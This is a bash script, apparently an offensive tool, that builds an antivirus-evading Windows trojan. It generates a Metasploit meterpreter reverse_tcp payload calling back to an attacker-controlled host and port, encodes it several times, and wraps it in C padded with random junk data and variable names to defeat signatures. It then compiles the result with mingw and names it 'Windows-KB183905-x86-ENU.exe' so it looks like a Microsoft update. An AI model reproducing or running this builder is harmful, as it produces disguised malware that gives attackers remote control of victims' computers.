#!/bin/bash
# Leg3nd's polymorphic payload compiler
# - This will bypass about 82% of AV's [8/ 43 (18.6%)]
# The shellcode is still contained, but the signitute of the file
# is obfuscated with random data before compiled.
# v1 r1


echo ' _              ____        _ '
echo '| |   ___  ___ <__ /._ _  _| |'
echo "| |_ / ._>/ . | <_ \| ' |/ . |"
echo "|___|\___.\_. |<___/|_|_|\___|"
echo "          <___'               "
echo "Obfuscating a windows/meterpreter"
echo " payload to bypass Anti-Virus"
echo "--------------------------------"


minCheck=`dpkg -l | grep -o mingw32`
if [ ! "$minCheck" ]; then apt-get -y install mingw32 ; fi

if [ -e "$PWD/trojan.c" ]; then rm -f "$PWD/trojan.c" ;fi
if [ -e "$PWD/payload.c" ]; then rm -f "$PWD/payload.c" ;fi
random1=`< /dev/urandom tr -dc A-Za-z0-9 | head -c2000`
random2=`< /dev/urandom tr -dc A-Za-z0-9 | head -c2000`
random3=`< /dev/urandom tr -dc A-Za-z0-9 | head -c2000`
random4=`< /dev/urandom tr -dc A-Za-z | head -c2000`
random5=`< /dev/urandom tr -dc A-Za-z | head -c2000`
random6=`< /dev/urandom tr -dc A-Za-z | head -c2000`
ranVar1=`< /dev/urandom tr -dc A-Za-z | head -c10`
ranVar2=`< /dev/urandom tr -dc A-Za-z | head -c10`
ranVar3=`< /dev/urandom tr -dc A-Za-z | head -c10`
ranVar4=`< /dev/urandom tr -dc 0-9 | head -c4`
ranVar5=`< /dev/urandom tr -dc 0-9 | head -c4`
ranVar6=`< /dev/urandom tr -dc A-Za-z | head -c8`
ranVar7=`< /dev/urandom tr -dc A-Za-z | head -c8`
ranVar8=`< /dev/urandom tr -dc A-Za-z | head -c10`
ranVar9=`< /dev/urandom tr -dc A-Za-z | head -c10`
ranVar10=`< /dev/urandom tr -dc A-Za-z | head -c4`
ranLetter1=`< /dev/urandom tr -dc A-Za-z | head -c4`
ranLetter2=`< /dev/urandom tr -dc A-Za-z | head -c4`
ranLetter3=`< /dev/urandom tr -dc A-Za-z | head -c4`
ranLetter4=`< /dev/urandom tr -dc A-Za-z | head -c4`
ranLetter5=`< /dev/urandom tr -dc A-Za-z | head -c4`
ranLetter6=`< /dev/urandom tr -dc A-Za-z | head -c4`

# payload variables
lhost=`cat /tmp/ipaddr.tmp`
lport="30503"
filename="Windows-KB183905-x86-ENU"

echo "[*] Preparing payload..."
msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | msfencode -e x86/shikata_ga_nai -c 15 -t raw | msfencode -e x86/countdown -c 5 -o payload.c c
sed -i 's/+//' payload.c
sed -i 1d payload.c
payload=$(cat  $"payload.c")

echo "[*] Obfuscating payload.."
echo "#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

char ${ranVar8}[] = \"$random4\";
char ${ranVar1}[] = \"$random1\";
char payload[] = $payload;
char ${ranVar2}[] = \"$random2\";
char ${ranVar9}[] = \"$random5\";

int main(int argc, char **argv, int $ranLetter1, int $ranLetter2, int $ranLetter3,int $ranLetter4, int $ranLetter5, int $ranLetter6) {
char ${ranVar7}[$ranVar4];
char ${ranVar10}[] = \"$random6\";
char *${ranVar6}[$ranVar5];
(*(void (*)()) payload)();
return(0);
char ${ranVar3}[] = \"$random3\";
}" >> trojan.c

echo "Compiling meterpreter..."
i586-mingw32msvc-gcc -mwindows trojan.c 
if [ -e "a.exe" ]; then mv a.exe "$PWD/temp/$filename.exe" ; fi

rm payload.c 2> /dev/null 1> /dev/null
rm trojan.c 1> /dev/null 2> /dev/null
echo;echo "*************************************"
echo "Saved to: $PWD/temp/"$filename".exe"
echo "*************************************"
exit
